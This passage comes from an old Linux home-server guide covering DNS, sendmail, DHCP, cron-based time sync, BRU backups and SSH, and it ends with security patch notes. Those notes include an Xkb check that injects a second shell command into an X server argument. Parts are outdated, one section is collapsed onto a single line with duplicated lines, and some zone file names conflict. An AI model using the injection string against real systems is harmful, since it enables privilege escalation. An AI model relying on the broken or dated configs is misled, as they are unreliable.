   ** If you don't see *ALL* of these, check your /etc/rc.d/rc.modules and
      try loading them manually by running "/etc/rc.d/rc.modules"

================================================================================
Section 19 - Install TCPDUMP and NetWatch for tracing traffic

You don't have to download TCPDUMP on Redhat5 if you installed it when you
installed Redhat.

TCPDUMP--

- Download "libpcap" and do the following commands:

   "configure"
   "make"
   "make install"
   "make install-man"
   "make install-incl"
   "cp libpcap/bpf/net/* /usr/include/net"

- Download "tcpdump" and do the following commands:

   "configure"
   "make"
   "make install"
   "make install-man"

- Now run "tcpdump" and watch it fly. Look at TCPDUMP's man page, as you can
  send captures to a file and filter the traffic down to only the stuff you
  care about based on source IP, destination IP, ports, UDP, TCP, etc..

NetWatch (uses a clumsy setup that defaults to Slackware, but it works nicely)--

   NOTE: This doesn't seem to work over telnet sessions. Only on the console.

- Download NetWatch

- Redhat users: create the file /etc/rc.d/rc.inet1 and substitute in your
  proper netmask
   ----
   NETMASK="255.255.255.0"    # REPLACE with YOUR netmask!
   ----

================================================================================
Section 20 - PPPd configuration [For Modem users only]

Ok.. You have a PPP enabled kernel running (Congrats!) Now let's get PPPD &
CHAT running.
Follow this link until I can integrate it into the TrinityOS doc:

   http://www.ecst.csuchico.edu/~dranch/PPP/ppp-performance.html#linux

================================================================================
Section 21 - Diald configuration [For Modem users only]

/etc/diald.conf

Use dcntrl or diald-top to see which packets bring the link up.

- /etc/rc.d/rc.S: enable the rc.serial load-up

- /etc/rc.d/rc.serial:

     /bin/setserial /dev/ttyS3 spd_vhi

- cp diald.conf /etc/diald

diald.conf:
----
restrict 16:00:00 20:45:00 * * *
down
restrict * * * * *
mode ppp
connect /etc/ppp/diald/earthlink-connect
device /dev/cua1
speed 115200
modem
lock
crtscts
local 192.168.1.7
remote 0.0.0.0
dynamic
defaultroute
accounting-log /var/adm/ppp.log
include /usr/local/lib/diald/standard.filter
----

================================================================================
Section 22 - BIND Installation and Configuration

Named

The DNS server running from the "Named" UNIX program is the service that
converts the name "www.yahoo.com" to the IP address 204.71.177.71. As you might
have already figured out, this is a CRITICAL program.

- To set up your own domain, all you need to do is register with the Internic
  at rs.internic.net and pay $75 for 2 years. Then, you need to find another
  domain that can SECONDARY for your DNS server in case your server goes down.

This document is intended for BIND v8.x though I have posted my old Bind v4
docs as well. The reason for this is that BIND v4.x and its configuration
files are old and now deemed -=* DEAD *=-. If you are unsure what version you
have installed, run "strings /usr/sbin/named | grep named" and look through
the results until you find the version number.

** If you need more info, follow this great HOWTO on DNS. It's a good resource
   but there are ERRORS in its config!!!:

   ftp://sunsite.unc.edu/pub/Linux/docs/HOWTO/DNS-HOWTO

*** NOTE: There is a MAJOR security exploit out there for older versions of
          Named.
          Make sure you are running at LEAST v4.9.7 or v8.1.2 or you will be
          vulnerable and getting ROOT access on your box will be EASY!
--

Slackware Specific:

- Uncomment the lines in the "/etc/rc.d/rc.inet2" file for "named"

Redhat5 Specific:

- Make sure /etc/rc.d/rc3.d/S55named exists

==========================================================================
Here are the configs for Bind v8.1.2
==========================================================================

/etc/resolv.conf
----
search trinnet.net
nameserver 127.0.0.1
----

Slackware: /etc/host.conf
----
order hosts, bind
multi on
----

Redhat: /etc/nsswitch.conf

   Change the "hosts" line to read:

      "hosts:      files dns nisplus nis "

/etc/aliases

- Towards the top, find the entry for "postmaster" and add an identical line
  for "hostmaster"

- If you rarely login as root but you do login to another account often,
  redirect your "root" mail to that address. To do this, change the line
  towards the bottom of the file to read:

      "root: your-preferred-mail-address"

   For me, it's: "root: dranch"

- Compile up the new alias database by running "newaliases"

/etc/named.conf
----
// /etc/named.conf
// Config file for caching only name server
options {
        directory "/var/named";
        allow-transfer {
                // ***** insert the IP address of your acting SECONDARY SERVER here
                //       208.162.41.10/32;
        };
        // Uncommenting this might help if you have to go through a
        // firewall and things are not working out:
        // query-source address * port 53;
};

zone "." {
        type hint;
        file "root.hints";
};

zone "0.0.127.in-addr.arpa" {
        notify no;
        type master;
        file "127.0.0.db";
};

zone "trinnet.net" {
        notify yes;
        type master;
        file "trinnet.net.db";
};

zone "137.83.1.24.in-addr.arpa" {
        notify yes;
        type master;
        file "24.1.83.137.db";
};

zone "0.168.192.in-addr.arpa" {
        notify no;
        type master;
        file "192.168.0.db";
};
----

/var/named/127.0.0.db
----
@       IN      SOA     ns.trinnet.net. hostmaster.trinnet.net. (
                        1       ; Serial
                        8H      ; Refresh
                        2H      ; Retry
                        1W      ; Expire
                        1D)     ; Minimum TTL
        NS      ns.trinnet.net.
1       PTR     localhost.
----

/var/named/192.168.0.db
----
@       IN      SOA     ns.trinnet.net. hostmaster.trinnet.net. (
                        1998041301      ; Serial, todays date + todays serial
                        8H              ; Refresh
                        2H              ; Retry
                        1W              ; Expire
                        1D)             ; Minimum TTL
        NS      ns.trinnet.net.
1       PTR     trinity2-int.trinnet.net.
2       PTR     stimpy2.trinnet.net.
4       PTR     dellster.trinnet.net.
9       PTR     spare.trinnet.net.
10      PTR     spare2.trinnet.net.
----

/var/named/24.1.83.137.0.db
----
@       IN      SOA     ns.trinnet.net. hostmaster.trinnet.net. (
                        1998041301      ; Serial, todays date + todays serial
                        8H              ; Refresh
                        2H              ; Retry
                        1W              ; Expire
                        1D)             ; Minimum TTL
        NS      ns.trinnet.net.
1       PTR     trinity2-int.trinnet.net.
2       PTR     stimpy2.trinnet.net.
4       PTR     dellster.trinnet.net.
9       PTR     spare.trinnet.net.
10      PTR     spare2.trinnet.net.
----

/var/named/root.hints.db
----
.                       6D      IN      NS      G.ROOT-SERVERS.NET.
.                       6D      IN      NS      J.ROOT-SERVERS.NET.
.                       6D      IN      NS      K.ROOT-SERVERS.NET.
.                       6D      IN      NS      L.ROOT-SERVERS.NET.
.                       6D      IN      NS      M.ROOT-SERVERS.NET.
.                       6D      IN      NS      A.ROOT-SERVERS.NET.
.                       6D      IN      NS      H.ROOT-SERVERS.NET.
.                       6D      IN      NS      B.ROOT-SERVERS.NET.
.                       6D      IN      NS      C.ROOT-SERVERS.NET.
.                       6D      IN      NS      D.ROOT-SERVERS.NET.
.                       6D      IN      NS      E.ROOT-SERVERS.NET.
.                       6D      IN      NS      I.ROOT-SERVERS.NET.
.                       6D      IN      NS      F.ROOT-SERVERS.NET.
G.ROOT-SERVERS.NET.     5w6d16h IN      A       192.112.36.4
J.ROOT-SERVERS.NET.     5w6d16h IN      A       198.41.0.10
K.ROOT-SERVERS.NET.     5w6d16h IN      A       193.0.14.129
L.ROOT-SERVERS.NET.     5w6d16h IN      A       198.32.64.12
M.ROOT-SERVERS.NET.     5w6d16h IN      A       202.12.27.33
A.ROOT-SERVERS.NET.     5w6d16h IN      A       198.41.0.4
H.ROOT-SERVERS.NET.     5w6d16h IN      A       128.63.2.53
B.ROOT-SERVERS.NET.     5w6d16h IN      A       128.9.0.107
C.ROOT-SERVERS.NET.     5w6d16h IN      A       192.33.4.12
D.ROOT-SERVERS.NET.     5w6d16h IN      A       128.8.10.90
E.ROOT-SERVERS.NET.     5w6d16h IN      A       192.203.230.10
I.ROOT-SERVERS.NET.     5w6d16h IN      A       192.36.148.17
F.ROOT-SERVERS.NET.     5w6d16h IN      A       192.5.5.241
----

/var/named/trinnet.net.db
----
;
; Zone file for trinnet.net
;
; The full zone file
;
@       IN      SOA     ns.trinnet.net. hostmaster.trinnet.net. (
                        1998041301      ; serial, todays date + todays serial #
                        8H              ; refresh, seconds
                        2H              ; retry, seconds
                        1W              ; expire, seconds
                        1D )            ; minimum, seconds
;
                NS      ns.trinnet.net.         ; Inet Address of name server
                NS      ns1.csil.com.           ; Inet address of secondary NS server
                MX      10 mail.trinnet.net.    ; Primary Mail Exchanger

ns              A       24.1.83.137
                HINFO   "a486/160/40M" "Linux 2.0"
mail            CNAME   ns
ftp             CNAME   ns
trinity2        CNAME   ns
;-----------------
trinity2-int    A       192.168.0.1
                HINFO   "a486/160/40M" "Linux 2.0"
stimpy2         A       192.168.0.2
                HINFO   "iPentium-II/260/64M" "Win95"
dellster        A       192.168.0.4
                HINFO   "iPentium-MMX/166/64M" "Win95"
spare           A       192.168.0.9
                HINFO   "Unknown" "Unknown"
spare2          A       192.168.0.10
                HINFO   "Unknown" "Unknown"
----

==========================================================================
Here are the configs for Bind v4.9.7
==========================================================================

- Edit/create "/etc/named.boot" file and make the following additions and
  changes:
----
;
; boot file for name server
;
;directory /usr/local/adm/
directory  /var/named
;
; type     domain                     source host/file     backup file
;
primary    trinity.value.net          trinity.db
primary    0.168.192.in-addr.arpa     192.168.db
primary    0.0.127.in-addr.arpa       localhost.db
xfernets   208.162.41.10&255.255.255.255
;
cache      .                          named.ca
;
----

- Edit/create "/var/named/192.168.db" file and make the following additions
  and changes:
------
;SOA
;domain                         ttl
;
0.168.192.in-addr.arpa.  IN  SOA  trinity.trinity.value.net. dranch.rocko.csuchico.edu. (
                                97110301        ; serial #
                                3600            ; refresh
                                600             ; retry
                                634000          ; expire: 1 week
                                86400 )         ; ttl: 1 day
0.168.192.in-addr.arpa.  IN  NS   trinity.trinity.value.net.
;
1       IN      PTR     trinity.trinity.value.net.
2       IN      PTR     stimpy2.trinity.value.net.
3       IN      PTR     spare.trinity.value.net.
4       IN      PTR     dellster.trinity.value.net.
9       IN      PTR     spare.trinity.value.net.
10      IN      PTR     spare2.trinity.value.net.
250     IN      PTR     hub.trinity.value.net.
-------

- Edit/create "/var/named/localhost.db" file and make the following additions
  and changes:
----
;SOA
;domain                         ttl
;
0.0.127.in-addr.arpa.  IN  SOA  trinity.trinity.value.net. dranch.rocko.csuchico.edu. (
                                1               ; serial #
                                3600            ; refresh
                                600             ; retry
                                634000          ; expire: 1 week
                                86400 )         ; ttl: 1 day
0.0.127.in-addr.arpa.  IN  NS   trinity.trinity.value.net.
1       IN      PTR     localhost.
-----

- Edit/create "/var/named/named.db" file and make the following additions and
  changes:
----
; This file holds the information on root name servers needed to
; initialize cache of Internet domain name servers
; (e.g. reference this file in the "cache  .  <file>"
; configuration file of BIND domain name servers).
;
; This file is made available by InterNIC registration services
; under anonymous FTP as
;     file                /domain/named.root
;     on server           FTP.RS.INTERNIC.NET
; -OR- under Gopher at    RS.INTERNIC.NET
;     under menu          InterNIC Registration Services (NSI)
;        submenu          InterNIC Registration Archives
;     file                named.root
;
;     last update:    Feb 28, 1997
;     related version of root zone:   1997022800
;
;
; formerly NS.INTERNIC.NET
;
.                        3600000  IN  NS    A.ROOT-SERVERS.NET.
A.ROOT-SERVERS.NET.      3600000      A     198.41.0.4
;
; formerly NS1.ISI.EDU
;
.                        3600000      NS    B.ROOT-SERVERS.NET.
B.ROOT-SERVERS.NET.      3600000      A     128.9.0.107
;
; formerly C.PSI.NET
;
.                        3600000      NS    C.ROOT-SERVERS.NET.
C.ROOT-SERVERS.NET.      3600000      A     192.33.4.12
;
; formerly TERP.UMD.EDU
;
.                        3600000      NS    D.ROOT-SERVERS.NET.
D.ROOT-SERVERS.NET.      3600000      A     128.8.10.90
;
; formerly NS.NASA.GOV
;
.                        3600000      NS    E.ROOT-SERVERS.NET.
E.ROOT-SERVERS.NET.      3600000      A     192.203.230.10
;
; formerly NS.ISC.ORG
;
.                        3600000      NS    F.ROOT-SERVERS.NET.
F.ROOT-SERVERS.NET.      3600000      A     192.5.5.241
;
; formerly NS.NIC.DDN.MIL
;
.                        3600000      NS    G.ROOT-SERVERS.NET.
G.ROOT-SERVERS.NET.      3600000      A     192.112.36.4
;
; formerly AOS.ARL.ARMY.MIL
;
.                        3600000      NS    H.ROOT-SERVERS.NET.
H.ROOT-SERVERS.NET.      3600000      A     128.63.2.53
;
; formerly NIC.NORDU.NET
;
.                        3600000      NS    I.ROOT-SERVERS.NET.
I.ROOT-SERVERS.NET.      3600000      A     192.36.148.17
;
; temporarily housed at NSI (InterNIC)
;
.                        3600000      NS    J.ROOT-SERVERS.NET.
J.ROOT-SERVERS.NET.      3600000      A     198.41.0.10
;
; temporarily housed at NSI (InterNIC)
;
.                        3600000      NS    K.ROOT-SERVERS.NET.
K.ROOT-SERVERS.NET.      3600000      A     198.41.0.11
;
; temporarily housed at ISI (IANA)
;
.                        3600000      NS    L.ROOT-SERVERS.NET.
L.ROOT-SERVERS.NET.      3600000      A     198.32.64.12
;
; temporarily housed at ISI (IANA)
;
.                        3600000      NS    M.ROOT-SERVERS.NET.
M.ROOT-SERVERS.NET.      3600000      A     198.32.65.12
; End of File
------

- Edit/create "/var/named/trinity.db" file and make the following additions
  and changes:
-----
;SOA
;domain                         ttl
;
trinity.value.net.  IN  SOA  trinity.trinity.value.net. trinity.value.net. (
                                97110301        ; serial #
                                3600            ; refresh
                                600             ; retry
                                634000          ; expire: 1 week
                                86400 )         ; ttl: 1 day
trinity.value.net.  IN  NS   trinity.trinity.value.net.
;
trinity.trinity.value.net.      IN      A       192.168.0.1
stimpy2.trinity.value.net.      IN      A       192.168.0.2
;
dellster.trinity.value.net.     IN      A       192.168.0.4
;
;
;
;
spare.trinity.value.net.        IN      A       192.168.0.9
spare2.trinity.value.net.       IN      A       192.168.0.10
;
hub.trinity.value.net.          IN      A       192.168.0.250
-----

================================================================================
Section 23 - Sendmail configuration

Once you get mail running, you will notice that when you send mail from your
machine, the receiver will see "ns.yourhost.com" in the reply field and NOT
"yourhost.com". To fix this, you need to enable sendmail masquerade. You can
do this the easy way or the harder way:

Easy way:

- edit /etc/sendmail.cf

- Near line 164, you will see "DM" by itself. Add your domain to this line. ie

      DMtrinnet.net

- Near lines 813 and 814, change the terse lines from this:

      #R$+                    $@ $>93 $1

  to this:

      R$+                     $@ $>93 $1

  and this:

      R$* < @ *LOCAL* > $*    $: $1 < @ $j . > $2

  to this:

      #R$* < @ *LOCAL* > $*   $: $1 < @ $j . > $2

Harder way:

- The Sendmail CF example files and the M4 scripting language need to be
  installed.
Redhaft5 users: Verify this by typing in "rpm -q sendmail-cf" - Goto /usr/lib/sendmail-cf/cf Redhat5: Edit the redhat.mc file and make it look as shows: ---- divert(-1) include(`../m4/cf.m4') divert(-1) include(`../m4/cf.m4') define(`confDEF_USER_ID',``8:12'') OSTYPE(`linux') undefine(`UUCP_RELAY') undefine(`BITNET_RELAY') MASQUERADE_AS(trinnet.net) FEATURE(masquerade_envelope) FEATURE(redirect) FEATURE(always_add_domain) FEATURE(use_cw_file) FEATURE(local_procmail) MAILER(procmail) MAILER(smtp) HACK(check_mail3,`hash -a@JUNK /etc/mail/deny') HACK(use_ip,`/etc/mail/ip_allow') HACK(use_names,`/etc/mail/name_allow') HACK(use_relayto,`/etc/mail/relay_allow') HACK(check_rcpt4) HACK(check_relay3) ---- - Next, edit or create /etc/sendmail.cw This file is very important to masquerade your domain properly. In this file, put in the name that is associated with your MX record. ---- # sendmail.cw - include all aliases for your machine here. ns.trinnet.net ---- - Now do the following: cp /etc/sendmail.cf /etc/sendmail.cf.orig export CFDIR="/usr/lib/sendmail-cf/cf" cd /usr/lib/sendmail-cf/cf" m4 ${CFDIR}/m4/cf.m4 redhat.mc > /etc/sendmail.cf /etc/rc.d/init.d/sendmail restart Thats it! Make sure to test it out though! ================================================================================ Section 24 - NTP Time calibration * Some of you might be wondering why I'm not using XNTP or simething like that. Why? Getdate is 37k with ALL the sources and compiled binaries. Ntp-4.0.72i is over 8.8MB! For fricken time! Yes, Xntp does a LOT more than getdate but for the purposes we need here, it is MASSIVE overkill. - Download Getdate and put it in /usr/src/archive - Uncompressit via "tar -xzvf - Edit the Makefile - Change the "PREFIX" to be /usr/local - Run "make", "make install", "make installman" - Now, goto http://www.eecis.udel.edu/~mills/ntp/clock1.html and pick a NTP server to connect to. Test that it is up by running "getdate your.ntp.site". 
        [root@trinity2 /root]# getdate ntp.nasa.gov
        ntp.nasa.gov: (-68) Sun Jun 14 10:27:28 1998

* There are TWO examples here: once an hour and every 15 minutes. If you are running Diald, this traffic will bring up the link. So, if you want to have your machine come up EVERY 15 MINUTES.. this is the way to do it.

- Slackware users:
  - Edit "/var/spool/cron/crontab/root" and add one of these lines to the bottom of the file:

    - 15 minutes:

        0,15,30,45 * * * * /usr/local/bin/getdate -adjust 1 120 your.ntp.site

    - 60 minutes:

        0 * * * * /usr/local/bin/getdate -adjust 1 120 your.ntp.site

- Redhat users:

  - 15 minutes:
    - Edit the /etc/crontab file and ADD this line ABOVE the cron.hourly line:

        0,15,30,45 * * * * root run-parts /etc/cron.15min

    - Copy an example file from the cron.daily dir to cron.15min:

        cp /etc/cron.daily/tmpwatch /etc/cron.15min/getdate

      ** Ps. If you missed it in Section 6, "tmpwatch" and thus "getdate" might not be root executable (bug). Fix this by doing:

        chmod +x /etc/cron.daily/tmpwatch
        chmod +x /etc/cron.15min/getdate

    - Edit the new /etc/cron.15min/getdate and make it look like so:

        /usr/local/bin/getdate -adjust 1 120 your.ntp.site

  - 60 minutes:
    - The stock /etc/crontab already has a "run-parts /etc/cron.hourly" line (the one the 15 minute entry goes above), so no new crontab line is needed. Do NOT add a second run-parts line for /etc/cron.daily: that would run every daily job once an hour.
    - Copy an example file from cron.daily into cron.hourly:

        cp /etc/cron.daily/tmpwatch /etc/cron.hourly/getdate

      ** Ps. If you missed it in Section 6, "tmpwatch" and thus "getdate" might not be root executable (bug). Fix this by doing:

        chmod +x /etc/cron.daily/tmpwatch
        chmod +x /etc/cron.hourly/getdate

    - Edit the new /etc/cron.hourly/getdate and make it look like so:

        /usr/local/bin/getdate -adjust 1 120 your.ntp.site

- Lastly, both 15 and 60 minute users need to tell CRON to re-read its configuration file by running:

        kill -HUP `ps aux | grep crond | grep -v -e grep | awk '{print $2}'`

================================================================================
Section 25 - DHCPd configuration

Note: This config statically defines an IP address per machine MAC address. I do this for security reasons. To find out the MAC address of a machine's ethernet card, do the following:

        Win95: run "winipcfg"

- Redhat:
  - Make sure that /etc/rc.d/rc3.d/S65dhcpd exists
  - Edit the file /etc/rc.d/init.d/dhcpd and change the following Start section line from:

        daemon dhcpd

    to:

        route add -host 255.255.255.255 eth0
        daemon dhcpd eth1

    NOTE: you need to change the interface name in BOTH lines (the 255.255.255.255 host route and the dhcpd argument must name the same interface) to whatever INTERNAL LAN interface you want DHCP to run on. Ie. You DON'T want DHCP to run on your Internet connection!!
- Slackware:
  - Add the following line to the /etc/rc.d/rc.inet1 file:

        route add -host 255.255.255.255 eth0

  - Add a line to execute dhcpd in the /etc/rc.d/rc.local file like:

        /usr/sbin/dhcpd eth1

- Create the file /etc/dhcpd.conf:

----
server-identifier trinity2-int.trinnet.net;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.0.255;
option routers 192.168.0.1;
option domain-name-servers 192.168.0.1, 24.1.64.33, 24.1.64.34;
option domain-name "trinnet.net";
default-lease-time 86400;

subnet 192.168.0.0 netmask 255.255.255.0 {
        range 192.168.0.9 192.168.0.10;
}

host dellster.trinnet.net {
        hardware ethernet 00:60:08:B1:36:4A;
        fixed-address 192.168.0.4;
        option host-name "dellster";
}
----

Note that the "range" line still hands out leases to any client whose MAC address is not listed in a "host" block; if only the listed machines should ever get an address, leave the range out.

================================================================================
Section 26 - POP3 remote mail services

If you have configured your IPFWADM rulesets correctly and have enabled "in.pop3d" in the /etc/inetd.conf file, i.e. un-# the POP3 line in /etc/inetd.conf and then run:

        kill -HUP `ps aux | grep inetd | grep -v -e grep | awk '{print $2}'`

mail should work right out of the box.

================================================================================
Section 27 - Configuring BRU and backing up

(It's not free if you don't go Redhat or Caldera but it's the best Linux backup software out there. This is one place you just CAN'T skimp!)

NOTE: I've noticed that the behavior of BRU between v14.3 and 15.0 (Bru2000) is quite different. Still works though!

Edit /etc/profile and add your appropriate time zone above the "export" command (this is for the Pacific time zone):

        TZ=PDT

Next, find the line that starts with "export" and add "TZ" to the end of it. Here is my "export" line:

        export PATH PS1 HOSTNAME HISTSIZE HISTFILESIZE USER LOGNAME MAIL NNTPSERVER TZ

Next, you need to set up BRU to understand your tape drive. Personally, I would recommend using ESTINC's setups at:

        http://www.estinc.com/brutabs.html

Or, start up X-Windows and run "bruconfig" and configure it that way.
Now we need to set up an exclude file so you don't back up things like CD-ROM drives or compress ZIP files, etc. First, back up the original file by doing "mv /etc/bruxpat /etc/bruxpat.orig" and then create this file and edit it to fit your needs:

--< /etc/bruxpat Start>--
# Updated 5/15/98 - dranch
#
# This file is used by -X option to provide an inclusion/exclusion
# list.  For each pathname of a file selected for backup, each line
# of this file is examined for a pattern, and that pattern is applied
# to the pathname.  If the pattern matches, the appropriate action
# is taken (the pathname is accepted or rejected).  If the pathname
# makes it through all the patterns it is accepted.
#
# These patterns will ONLY be applied to filenames that are part
# of directories that are specified on the bru command line (or
# the current directory, if none are specified).
#
#
# Each command line in the bruxpat file (the file you are now reading)
# consists of a control field and a pattern.  The pattern
# is separated from the control field by whitespace.  Control field
# characters are:
#
#       i       Include this pathname if pattern matches.  The
#               pathname is accepted and no further patterns are
#               applied.
#               *** NOTE ****
#               It stops trying on the first pattern match found
#               and passes the filename.  Since it scans patterns
#               in the order listed, "include" patterns normally
#               should be listed before any "exclude" patterns.
#
#       x       Exclude this pathname if pattern matches.  The
#               pathname is rejected and no further patterns are
#               applied.
#
#       z       Exclude this pathname from compression if pattern
#               matches (if the -Z option is specified).
#
#       s       The pattern is a shell style wildcard pattern except
#               that '/' characters are not treated as special characters.
#
#       r       The pattern is a regular expression (same as used by the "grep"
#               command).
#
#       l       The pattern is a literal string.
#
# Exclude all core files
xs      */core
xs      core

# Don't try to get the stuff in /proc
xs      /proc/*
xs      ./proc/*

# Don't backup the CD-Rom
xs      /home/hpe/Cdrom1/*
xs      ./home/hpe/Cdrom1/*
xs      /home/hpe/Cdrom2/*
xs      ./home/hpe/Cdrom2/*

# Exclude all files and subdirectories in the temporary directories.
# Handle files specified with relative and absolute pathnames
#
# -- NOTE -- the actual directory names will still be backed up,
#            only the files within the directories will be
#            excluded.
#xs     ./usr/tmp/*
#xs     /usr/tmp/*
#xs     ./tmp/*
#xs     /tmp/*

# Don't compress files that end in ".z" or ".Z"
zs      *.[Zz]
zs      *.zip
zs      *.ZIP
zs      *.arj
zs      *.ARJ
zs      *.[Aa][0-50]
zs      *.[0-50]
zs      *.gz
zs      *.GZ
zs      *.gzip
zs      *.GZIP
zs      *.bz2
zs      *.BZ2
zs      *.tgz
zs      *.TGZ
zs      *.tar.gz
zs      *.tar.bz2
zs      *.rpm
zs      *.RPM
--< /etc/bruxpat End>--

Create the file /usr/local/sbin/bru-fullbackup with the following in it. NOTE: You might want to change the label field to your tape drive and the proper date.

--< /usr/local/sbin/bru-fullbackup start>--
#!/bin/sh
clear
# Edited 5/13/98
echo "Setting environment vars"
export BUFSIZE=2048k
export BRUTMPDIR=/tmp

# Do not use -j, -m,
echo "Starting BRU full backup with exclusions, compression, user intervention"
bru -c -vvvv -V -X -Z -G -L "Conner Tr4 05/13/98 - FULL" -f /dev/st0 / > /var/log/bru-log

# v1.28.98
# See /etc/bruhelp for A LOT more details...
#
# Defaults to backing up "/"
#
# -c    : create (autoscan verification on by default)
#       : - if you specify -i or -d, autoverify is disabled
#
# -d    : file comparison (normal)
# -dd   : file comparison access mod, lengths, symlinks, ID groups
# -dddd : file comparison - narly
#
# -e    : Estimate archive size
#
# -f    : select regular input device (same as -r)
#
# -g    : Read : Dumps the header block
# -gg   : Read : Generates ted cmd line, label, date, time, release,
#
# -h    : Print this help information
#
# -i    : inspect a archive *checksum of a directory)
#       : Not needed with "-v"
#
# -r    : Backup a raw partition
#
# -t    : List archive table of contents for files
#
# -u    - use selected files
#       a - all files
#       b - block special files
#       c - character (special files)
#       d - dirs
#       l - syms
#       p - fifos
#       r - reg
#
# -vvvv : Level 4 verbosity
#
# -w    : confirmation of each file
#
#       : wildcard expansion [must be placed in double quotes]
# -x    : restore
#
# -G    : Write a archive list (header block) at beginning of
# -L    : Label the tape
# -B    : disabled user intervention
# -D    : Enabled double buffering for faster throughput
# -Z    : compression
# -V    : execution summary w/o volume
# -X    : Exclude specific files
#
# bru -gg -f /dev/st0 : Display archive contents if written
#
#bru -vv -t -f /dev/st0 : Display entire contents of archive tape
#
#bru -x -vvvv /user/dranch/*
#
# Also, these environment variables are available in /etc/brutab
#
# Global BRU settings
#
#+OVERWRITEPROTECT=YES
#+RECYCLEDAYS=180
#+MAXWRITES=200
#+ZBUFSIZE=512k
#+SHELL=/bin/sh
#+BRUTABONLY=no
#+DEVNAMECHECK=no
#+MATCHLEVEL=2
#+MAXFILENAMELEN=255
#+READCHECKLEVEL=1
#+BRUHELP=/bru/bruhelp
#+BRUMAXWARNINGS=1000
#+BRUMAXERRORS=500
#+BRUXPAT=/etc/bruxpat
#+BRURAW=/etc/bruraw
#+BRUSMARTREST=/etc/brusmartrest
#+BRUREMOVELOG=/var/adm/bruremovelog
#+BRUTMPDIR=/tmp
--< /usr/local/sbin/bru-fullbackup End.>--

Ok.. now, insert a tape in the tape drive and run "/usr/local/sbin/bru-fullbackup".
I usually also run "tail -f /var/log/bru-log" in another TTY to watch the progress of the backup.

================================================================================
Section 28 - Full SSH telnet and X-windows encrypted tunnels

- Goto ftp://ftp.cs.hut.fi/pub/ssh and download the newest SSH server available (this is also the Unix SSH client)
- If you want an awesome Windows SSH client, download the Secure-CRT telnet/SSH client from http://www.vandyke.com/ (not directly FTP'able due to an export-law form)
- Un-tar the UNIX server/client by running "tar -xzf ssh-1.2.25.tar.gz"
- Now run "./configure", "make", "make install"
- Next, edit the /etc/rc.d/rc.local file and append the following:

        #
        echo "Starting sshd..."
        /usr/local/sbin/sshd

- Load up the SSHd program for testing by entering in "/usr/local/sbin/sshd &"
- Now, load up your SSH client (Secure-CRT used for this example) and do the following:
  - File --> Quick Connect --> "Session list" tab --> New
  - Enter in the name of a SSH site to connect to
  - Change the protocol to "SSH"
  - Enter in the fully qualified domain name of the remote site
  - Verify the port is set to "22"
  - Enter in your username for the remote site
  - Change the Cipher to "3DES"
  - Change the authentication to "password"
  - Now click on "Keygen"
  - Click on Next
  - Skip setting up the "Passphrase" and just click on "Next"
  - Leave the encryption setting at "1024" and click on "Next"
  - Now you will need to move the mouse around to help simulate a random number generator to create your private/public key pairs.
  - Click on "Next"
  - Click on "Finished"
- That's it. From S-CRT, go ahead and try connecting to your remote SSH server and you should be prompted with a dialog box asking to "Accept and save" the keypair. Click on "OK". Now you should be prompted to enter in your password and you should now login over an SSH tunnel!
- To SSH from your Linux box, just run "ssh xyz" where "xyz" is the remote SSH-enabled server's fully qualified domain name.

================================================================================
################################################################################
--- These features have NOT been completed yet ---
################################################################################
================================================================================
Section - Full APC SmartUPS powerdown support

- Install "apcupsd"
  Instructions to be added shortly!

================================================================================
Section - Sound card utilities

  SoundBlaster 16 mixer
  WAV player/recorder

================================================================================
Section - Samba installation and configuration

- Samba (stock in Redhat if installed)

================================================================================
Section - System optimization and tuning

- Tuning:
  - IRQTune   ftp://shell5.ba.best.com/pub/cae/irqtune.tgz
  - HDparm -u

================================================================================
Section - WWW Caching Proxy

- WWW proxy (Apache or Squid)

================================================================================
Section - Transparent WWW Banner/Ad filtering

- WWW Ad banner filtering
        http://www-math.uni-paderborn.de/~axel/NoShit/index.html
        patch:          http://www.america.com/~chrisf/web/NoShit/WebFilter_0.5.patch.gz
        Example filter: http://www.america.com/~chrisf/web/NoShit/library.txt

################################################################################
These features will NEVER be finished since UNIX is a moving target. If there is *ONE* section in TrinityOS to watch.. it's the BOTTOM of this doc (ie.. this next section!!!)
Section 34 - Final Security and up-to-date Linux Security & patching
################################################################################

- IP logger
        ftp://ftp.tu-graz.ac.at/pub/linux/redhat-contrib/SRPMS/iplogger-0.1-1.src.rpm

/etc/profile
--
rm ~$LOGNAME/.bash_history
--

- TripWire
        ftp://coast.cs.purdue.edu/pub/COAST/Tripwire

- Verify all security exploits
        http://www.ecst.csuchico.edu/~jtmurphy/
        http://www.users.interport.net/~reptile/linux/index.html

chmod 1777 /usr/local/lib/bru (assuming root login)
or
My /usr/local/lib/bru directory is 775, works fine (as expected) from root.

great Security URLS:
        ftp://ftp.win.tue.nl/pub/security

sendmail: 8.8.6.1

KSR[T] Advisory #003
Date: Aug 05, 1997
ID #: lin-cron-003
Operating System(s): Redhat linux 4.1, SuSE Linux 5.0, Slackware 3.3
Affected Program: updatedb / crontabs

Syn Attack logs:  http://www.whitefang.com/synlog.html
IP filtering:     ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt
CRON exploit:     ftp://ftp.cdrom.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz

psaux: The Quick fix: chmod 660 /dev/psaux

2/9/98: Xkb
1. as usual chmod u-s,g-s all installed Xserver binaries (*)

   Quick vulnerability check:
        $ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;'
        [exit X server]
        $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'

   * remove setuid/setgid bit from all installed Xservers
   * use xdm or a safe setuid wrapper to start Xserver

2/9/98: Device DoS
        ls -l /dev/* | grep "r-- "
        chmod ;)

2/9/98: Upgrade to ld.so v1.9.5 or better..

2/9/98: The patch corrects the coredump error in both imapd and ipop3d (the pine version of pop3 server). Patch is against pine 3.96

diff -ru log_lnx.c.orig log_lnx.c
--- log_lnx.c.orig      Tue May  2 00:08:20 1995
+++ log_lnx.c   Thu Feb  5 08:49:31 1998
@@ -55,7 +55,8 @@
                                 /* allow case-independent match */
   if (!pw) pw = getpwnam (lcase (strcpy (tmp,user)));
                                 /* no entry for this user or root */
-  if (!(pw && pw->pw_uid)) return NIL;
+  if (!(pw)) return NIL;
+  if (!(pw->pw_uid)) return NIL;
   if(!(spw = getspnam (pw->pw_name))) return NIL;
                                 /* validate password */
   if (strcmp (spw->sp_pwdp,(char *) pw_encrypt(pass,spw->sp_pwdp))) return NIL;

2/9/98 chmod 700 /dev/zero
        Date: Fri, 6 Feb 1998 07:59:46 +0100

